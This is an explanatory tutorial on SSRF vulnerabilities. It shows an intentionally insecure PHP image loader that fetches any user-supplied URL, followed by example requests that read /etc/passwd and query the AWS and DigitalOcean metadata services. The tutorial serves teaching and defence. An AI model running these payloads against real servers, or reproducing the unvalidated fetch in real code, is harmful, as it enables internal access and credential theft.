Server-Side Request Forgery, commonly known as SSRF, is a vulnerability in which an attacker can make the vulnerable server (the web application) issue requests to other servers. Because those requests originate from the server itself, they can bypass the firewall and let the attacker reach internal servers that are not exposed to them directly.
It usually happens when the application sends a request and gives the user partial control over it (e.g. part of the URL). An attacker may be able to exploit this to control the whole request and craft malicious requests from the target server to both internal and external hosts.
Severity: High
In the following example we have a simple web application which loads and displays images.
<?php
# Check if the 'image_url' GET variable is set
if (isset($_GET['image_url'])) {
    $url = $_GET['image_url'];
    # Fetch the image from the user-supplied URL (no validation of scheme or host: this is the SSRF)
    $file = fopen($url, 'rb');
    # Send proper header for png images
    header("Content-Type: image/png");
    # Dump image file
    fpassthru($file);
} else {
    # Notify user if they didn't enter a URL
    echo 'Please enter image url';
}
?>
Normal use: the application fetches and displays a remote image:
http://localhost/ssrf.php?image_url=https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png
With the file:// scheme, the same parameter makes the server read a local file:
http://localhost/ssrf.php?image_url=file:///etc/passwd
By looking at the page source we will find the contents of /etc/passwd in the response body.
To read the instance hostname from the AWS metadata service we can use:
http://localhost/ssrf.php?image_url=http://169.254.169.254/latest/meta-data/hostname
For DigitalOcean metadata:
http://localhost/ssrf.php?image_url=http://169.254.169.254/metadata/v1.json
By using SSRF you can perform port scanning of the internal network to discover services running on it, which may lead to further exploitation.
Depending on the server's configuration, other URL schemes may also be accepted, such as file://, ftp:// and gopher://.